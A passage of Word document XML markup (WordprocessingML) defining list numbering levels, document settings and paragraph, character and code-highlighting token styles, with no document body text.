    <w:tmpl w:val="00A99411"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="36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decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="36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decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2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2"/>
  </w:num>
  <w:num w:numId="4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0"/>
  </w:num>
  <w:num w:numId="6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9"/>
  <w:embedSystemFonts/>
  <w:doNotTrackMoves/>
  <w:documentProtection w:enforcement="0"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footnotePr>
    <w:footnote w:id="0"/>
    <w:footnote w:id="1"/>
  </w:footnotePr>
  <w:compat>
    <w:useFELayout/>
    <w:splitPgBreakAndParaMark/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiM2E5ODY1YmVlY2NhZjVjN2NkOTdmNTE5NDRjMGQzZTgifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="226B6A15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HAnsi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qFormat="1" w:uiPriority="9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unhideWhenUsed="0" w:uiPriority="0" w:semiHidden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10" w:semiHidden="0" w:name="Title"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Closing"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Signature"/>
    <w:lsdException w:uiPriority="0" w:name="Default Paragraph Font"/>
    <w:lsdException w:qFormat="1"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11" w:semiHidden="0" w:name="Subtitle"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Salutation"/>
    <w:lsdException w:qFormat="1"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qFormat="1" w:uiPriority="9" w:semiHidden="0" w:name="Block Text"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="FollowedHyperlink"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Strong"/>
    <w:lsdException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semiHidden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200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="31"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr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paragraph" w:styleId="4">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="32"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr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paragraph" w:styleId="5">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="33"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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6">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="34"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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7">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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8">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="36"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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85858" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="37"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="585858" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="38"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="19">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="18">
    <w:name w:val="Normal Table"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Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="21"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="180" w:after="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="100" w:after="100"/>
      <w:ind w:left="480" w:right="480" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Date"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="200"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="16"/>
    <w:next w:val="3"/>
    <w:link w:val="26"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="25"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr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paragraph" w:styleId="17">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
  </w:style>
  <w:style w:type="character" w:styleId="20">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="21"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="22">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="21"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="23">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="16"/>
    <w:uiPriority w:val="10"/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customStyle="1" w:styleId="26">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="15"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="585858" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="27">
    <w:name w:val="Author"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="200"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="28">
    <w:name w:val="Abstract Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="300" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="29">
    <w:name w:val="Abstract"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:after="300"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="30">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/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character" w:customStyle="1" w:styleId="32">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/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character" w:customStyle="1" w:styleId="33">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="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34">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="8"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="585858" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="9"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="585858" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="10"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="11"/>
    <w:semiHidden/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="Footnote Block Text"/>
    <w:basedOn w:val="17"/>
    <w:next w:val="17"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="100" w:after="100"/>
      <w:ind w:left="480" w:right="480" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="41">
    <w:name w:val="Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed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  <w:tblStylePr w:type="firstRow">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="auto" w:sz="0" w:space="0"/>
        </w:tcBorders>
        <w:vAlign w:val="bottom"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="Definition Term"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="43"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="Definition"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="47">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="46"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="49"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="49">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="21"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="51">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="3"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="72">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="73">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="74">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="75">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="76">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="77">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="78">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="79">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="81">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="48"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="82">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="48"/>
